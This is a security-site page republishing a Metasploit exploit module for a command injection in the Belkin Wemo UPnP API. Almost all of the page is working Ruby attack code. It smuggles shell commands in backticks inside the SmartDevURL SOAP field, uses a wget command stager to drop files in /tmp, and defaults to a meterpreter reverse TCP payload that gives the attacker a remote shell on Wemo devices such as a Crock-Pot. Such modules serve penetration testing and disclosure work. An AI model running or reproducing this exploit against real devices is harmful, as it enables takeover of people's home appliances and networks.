Belkin Wemo UPnP Remote Code Execution

2019.02.20
Credit: wvu
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager def initialize(info = {}) super(update_info(info, 'Name' => 'Belkin Wemo UPnP Remote Code Execution', 'Description' => %q{ This module exploits a command injection in the Belkin Wemo UPnP API via the SmartDevURL argument to the SetSmartDevInfo action. This module has been tested on a Wemo-enabled Crock-Pot, but other Wemo devices are known to be affected, albeit on a different RPORT (49153). }, 'Author' => [ 'phikshun', # Discovery, UFuzz, and modules 'wvu' # Crock-Pot testing and module ], 'References' => [ ['URL', 'https://web.archive.org/web/20150901094849/http://disconnected.io/2014/04/04/universal-plug-and-fuzz/'], ['URL', 'https://github.com/phikshun/ufuzz'], ['URL', 'https://gist.github.com/phikshun/10900566'], ['URL', 'https://gist.github.com/phikshun/9984624'], ['URL', 'https://www.crock-pot.com/wemo-landing-page.html'], ['URL', 'https://www.belkin.com/us/support-article?articleNum=101177'], ['URL', 'http://www.wemo.com/'] ], 'DisclosureDate' => '2014-04-04', 'License' => MSF_LICENSE, 'Platform' => ['unix', 'linux'], 'Arch' => [ARCH_CMD, ARCH_MIPSLE], 'Privileged' => true, 'Targets' => [ ['Unix In-Memory', 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Type' => :unix_memory, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/generic' } ], ['Linux Dropper', 'Platform' => 'linux', 'Arch' => ARCH_MIPSLE, 'Type' => :linux_dropper, 'DefaultOptions' => { 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp' } ] ], 'DefaultTarget' => 1, 'Notes' => { 'Stability' => [CRASH_SAFE], 'SideEffects' => [ARTIFACTS_ON_DISK] } )) register_options([ Opt::RPORT(49152) ]) register_advanced_options([ OptBool.new('ForceExploit', [true, 'Override check result', false]), OptString.new('WritableDir', [true, 'Writable directory', '/tmp']) ]) end def check res = send_request_cgi( 'method' => 'GET', 'uri' => '/setup.xml' ) if res && res.code == 200 && res.body.include?('urn:Belkin:device:') vprint_good('Wemo-enabled device detected') return CheckCode::Appears end CheckCode::Safe end def exploit checkcode = check unless checkcode == CheckCode::Appears || datastore['ForceExploit'] fail_with(Failure::NotVulnerable, 'Set ForceExploit to override') end case target['Type'] when :unix_memory execute_command(payload.encoded) when :linux_dropper cmdstager = generate_cmdstager( flavor: 'wget', temp: datastore['WritableDir'], file: File.basename(cmdstager_path), noconcat: true ) # HACK: "chmod +x" cmdstager.unshift("cp /bin/sh #{cmdstager_path}") cmdstager.delete_if { |cmd| cmd.start_with?('chmod +x') } cmdstager = cmdstager.join(';') vprint_status("Regenerated command stager: #{cmdstager}") execute_command(cmdstager) end end def execute_command(cmd, opts = {}) send_request_cgi( 'method' => 'POST', 'uri' => '/upnp/control/basicevent1', 'ctype' => 'text/xml', 'headers' => { 'SOAPACTION' => '"urn:Belkin:service:basicevent:1#SetSmartDevInfo"' }, 'data' => generate_soap_xml(cmd) ) end def generate_soap_xml(cmd) <<EOF <?xml version="1.0" encoding="utf-8"?> <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <s:Body> <u:SetSmartDevInfo xmlns:u="urn:Belkin:service:basicevent:1"> <SmartDevURL>`#{cmd}`</SmartDevURL> </u:SetSmartDevInfo> </s:Body> </s:Envelope> EOF end def cmdstager_path @cmdstager_path ||= "#{datastore['WritableDir']}/#{rand_text_alphanumeric(8..42)}" end end


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top